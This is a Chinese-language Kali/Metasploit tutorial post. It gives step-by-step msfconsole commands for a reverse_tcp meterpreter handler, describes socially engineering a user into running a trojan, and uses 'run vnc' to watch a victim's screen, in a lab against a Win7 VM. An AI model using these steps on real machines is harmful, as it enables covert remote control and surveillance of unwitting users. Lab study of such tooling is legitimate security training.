课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络***干货!
3、Kali 与编程每天准时更新,敬请学习和关注!
正文部分
一、背景介绍
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用***控制受害者主机呢?接下来让我们一起学习!
二、资源装备
1.安装好且已经被安装***的Win7虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
三、战略安排
3.1 利用Metasploit(msf)***框架对目标受害者主机进行***控制,如下图所示。
步骤1:开启Metasploit(msf)***测试框架,如下图所示。
命令:msfconsole
步骤2:使用对应的漏洞利用模块,如下图所示。(当然你也可以利用search命令检索对应的漏洞进行利用)
命令:use exploit/multi/handler
步骤3:设置payload连接方式,如下图所示。
命令:set payload windows/meterpreter/reverse_tcp
步骤4:查看***模块需要设置的参数,如下图所示。
命令:show options
步骤5:需要设置的***参数如下图所示。
Lhost:***者主机IP地址。
步骤6:查看***者主机(Kali主机)的IP地址,如下图所示。
命令:ifconfig
步骤7:设置对应的参数,如下图所示。
这里以设置lhost(***者主机IP)举例
命令:set lhost IP
例子:set lhost 192.168.78.144
步骤8:查看对应的参数是否设置成功,如下图所示。
命令:show options
步骤9:运行***模块,如下图所示。
命令:run
3.2 利用社会工程学相关手段诱导受害者主机使用者启动其主机已经下载的***文件(这里做实验就直接进入受害者主机双击打开),如下图所示。
3.3 如下图所示,在Kali***者主机生成了对应的session会话。
3.4 利用***控制受害者主机,如下图所示。
步骤1:运行vnc程序监控目标主机,如下图所示。
命令:run vnc
步骤2:如下图所示,运行命令后对应的监控画面显示到kali主机中,可以监控受害者主机的一举一动。
小编一个个字敲打创作,可辛苦了,问君可否关注一下我呢?你还可搜索:Kali与编程,学习更多******技巧呢 !拒绝盗版,转载请声明来源:Kali与编程
点我学习更多Kali Linux***测试与网络***实战技巧!
来源:oschina
链接:https://my.oschina.net/u/4298883/blog/4700314